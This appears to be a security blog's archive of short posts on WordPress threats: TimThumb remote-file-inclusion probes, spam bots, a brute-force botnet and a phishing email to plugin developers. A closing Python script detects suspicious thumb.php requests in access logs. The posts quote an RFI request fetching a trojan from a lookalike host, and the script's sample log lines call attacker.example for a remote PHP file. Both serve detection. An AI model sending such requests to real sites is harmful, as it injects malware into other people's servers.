Category Archives: Internet Security
Are We Seeing an End to Timthumb Attacks on WordPress?
Lately we have seen a decline in the number of TimThumb RFI attacks against our WordPress sites. A year ago this was the most common hacking probe logged for every WordPress site we manage. Back then we’d see a lot: from 10 to 50, sometimes more, different sources a day. Hardly a day would go by without at least one hacker looking for the vulnerability.
Over the last 6 months, the number of witnessed attempts has declined. Sometimes we don’t see a single probe looking for the old, vulnerable, timthumb.php / thumb.php script for several days.
Opera User Agent “Bork-Edition”
Have you seen Bork-edition user agent strings? Wondered what browser uses this string? Maybe noticed that nearly all traffic to your site with Bork-edition in the user agent string is spam and hacking attempts? User agents with Bork-edition are considered by at least one writer to be among the top 10 spam bots that must be blocked.
There are several user agents which at first glance look harmless, e.g. the user agent string Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]
Just when I thought I’d seen it all, I get some really weird spam e-mail from a webform response. Every possible field filled in with a website URL, or nonsense text. And there are lots of fields. Stranger still, the mail form responds to a promotion that ended in October last 2011…
Apparent Botnet Attacked My WordPress Website
What appeared to be a botnet attacked one of my sites (tech.graphicline.co.za) this morning in a brute-force wp-login attempt from multiple IP addresses. This was the most coordinated attack against any of my sites I’ve experienced. Usually the hacker bots I see use up to 6 IPs in these attacks – 146 IPs is serious stuff…
146 IPs Used in Simultaneous Attack
The IPs listed below are the guilty parties to this brute-force login attack on the site. The main attack started at 05h09 GMT this morning (November 25, 2012) and continued until 05h15 GMT. A second but less intense attack followed, starting from 05h16 GMT and tailing off until ending at 05h43 GMT.
Hacker Bot FreeWebMonitoring SiteChecker/0.1 Pays a Visit
Bad bot “FreeWebMonitoring SiteChecker/0.1 (+http://www.freewebmonitoring.com)” paid a visit to one of my websites yesterday from IP address 18.104.22.168 which belongs to Canadian service provider: Canada Montreal Thst Golf Inc.
The full range of IPs owned by Canada Montreal Thst Golf Inc. is 22.214.171.124 – 126.96.36.199
This bot is not the bot used by freewebmonitoring.com. Their bot is “FreeWebMonitoring SiteChecker/0.2 (+http://www.freewebmonitoring.com/bot.html)”
Baidu and Yandex Bots Forbidden Access
That’s it, folks: I have denied access to the Baidu and Yandex web spiders. I don’t want them crawling my sites, and I don’t want them crawling my clients’ sites (unless the client wants them to, of course). Both these bots do not follow advanced robots.txt disallow rules, and crawl areas of the sites I don’t want indexed… In particular I don’t want them continually searching my sites for non-existent RSS feeds and /trackback URLs, thus generating excessive page not found errors.
I am becoming stricter with web bots that do not comply with the more advanced robots.txt rules, e.g. “disallow /feed” and wildcards. Google obeys these rules, Bing obeys these rules, any other worthwhile search engine should also obey these rules.
verify-Compliance_Page | notified-Compliance_Page
I noticed a few 404 page not found errors in activity logs for several sites today using these strings: verify-Compliance_Page?aHR0cDovL3d3dy5ncmFwaGljbGluZS5jby56YS8= and notified-Compliance_Page with the same rubbish string on the end. When I find odd GET requests I invariably try to find out more information about what the ‘visitor’ is trying to do. Are they trying to hack, access forbidden areas, upload malware or post spam…
As far as verify-Compliance_Page and notified-Compliance_Page are concerned, the amount of substantiated information is notable only in its scarcity. So for any webmaster who is also looking for this information about these odd GET requests, this is what I was able to establish.
Phishing Scam Targets WordPress Plugin Developers
What may be the first phishing scam specifically targeting WordPress Plugin authors has been discovered. The scam comes in the form of an e-mail claiming the developer’s plugin has been removed from the WordPress Repository, and tells the plugin author to use the link in the mail to log in and change their password.
The e-mail uses the Subject line “[WordPress.org Plugins] Urgent: Your Plugin Has Been Removed” and has this message content:
Dear WordPress Plugin Developer,
Unfortunately, a plugin you are hosting has been temporarily removed from the WordPress repository. We are going to manually review your plugin because it has been reported for violating our Terms of Service. If your plugin does not get approved then it will be permanently removed from the WordPress repository.
You can check if your plugin has been approved or rejected at…
This is not an official WordPress email!
Microsoft Security Essentials Under Microscope
A look at Microsoft Security Essentials, the free anti-virus application from Microsoft. Is Microsoft Security Essentials any good? Will it protect a Windows PC from most common threats? Can MSE compete with commercial security applications?
Over the next few months we will see.
Annoyed with Commercial AV Software.
I have become increasingly annoyed with commercial anti-virus applications. They have become overpriced, use too many system resources, interfere with other applications, or slow down internet access. Worse still, none of the apps are able to detect every virus or malware… An example is Trojan Generic 24, which seems to be only detected by AVG (but doesn’t stop or remove it). Trend Micro Titanium and Norton AV don’t find all versions of this dangerous trojan.
Hackers Using Picasa Spoof for Web Malware
Strange looking referer URLs and GET requests that appear to be Picasa are being used by hackers to find website vulnerabilities to inject malware or spam. Examining the details of the referer reveals something like this example /wp-content/themes/biznizz/thumb.php?src=http://picasa.com.jcibuenos*****.com.ar/2.php (stars replace the actual characters in string for your safety – leads nowhere). This particular example will inject malware using the WordPress TimThumb exploit. The file 2.php contains a trojan horse!
Picasa is of course picasa.google.com, but the similarity can lead the unwary to disregard the source. These strings are typically long, similar in appearance to a Google search request string. Any URL containing this odd string (or similar) should be regarded as extremely suspicious, and the IP should at least be checked for known bad behaviour and blocked from accessing the website. The string is often seen along with WordPress TimThumb exploit attempts.
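An added example, not code from the original post: one way to pick the Picasa-style lookalike requests described above out of an access log, by checking whether the host in a thumb.php / timthumb.php src parameter only embeds a trusted name rather than being that domain or a true subdomain of it. The trusted-name list, the log format (Apache combined) and the sample lines are assumptions made for the illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: names a lookalike host might imitate; tune this for your own sites.
TRUSTED = ("picasa.com", "google.com", "flickr.com")
THUMB_RE = re.compile(r"/(?:tim)?thumb\.php$", re.IGNORECASE)
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify_src(src):
    """Return 'local', 'trusted', 'lookalike' or 'remote' for a src= value."""
    host = (urlsplit(src).hostname or "").lower()
    if not host:
        return "local"            # relative path: image on the same site
    for name in TRUSTED:
        if host == name or host.endswith("." + name):
            return "trusted"      # the real domain or a true subdomain of it
    if any(name in host for name in TRUSTED):
        return "lookalike"        # trusted name embedded in a foreign host
    return "remote"

def suspicious_requests(log_lines):
    """Yield (ip, verdict, src) for thumbnail-script requests with a remote src."""
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        url = urlsplit(target)
        if not THUMB_RE.search(url.path):
            continue
        for src in parse_qs(url.query).get("src", []):
            verdict = classify_src(src)
            if verdict in ("lookalike", "remote"):
                yield ip, verdict, src

# Constructed sample log lines (documentation IP ranges, placeholder hosts).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2013:05:09:01 +0000] "GET /wp-content/themes/biznizz/thumb.php?src=http://picasa.com.attacker.example/2.php HTTP/1.1" 404 512 "-" "-"',
    '198.51.100.20 - - [01/Jan/2013:05:09:05 +0000] "GET /wp-content/themes/biznizz/thumb.php?src=/wp-content/uploads/logo.png HTTP/1.1" 200 9120 "-" "-"',
    '203.0.113.9 - - [01/Jan/2013:05:10:11 +0000] "GET /wp-content/plugins/demo/timthumb.php?src=http://files.example.net/x.php HTTP/1.1" 404 512 "-" "-"',
    '198.51.100.21 - - [01/Jan/2013:05:11:30 +0000] "GET /thumb.php?src=http://picasa.google.com/img.jpg HTTP/1.1" 200 4100 "-" "-"',
    '198.51.100.22 - - [01/Jan/2013:05:12:00 +0000] "GET /index.php HTTP/1.1" 200 1800 "-" "-"',
]

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

The IPs it reports are candidates for the reputation check and block the text recommends; a "remote" verdict is weaker evidence than "lookalike" and is worth reviewing rather than blocking outright.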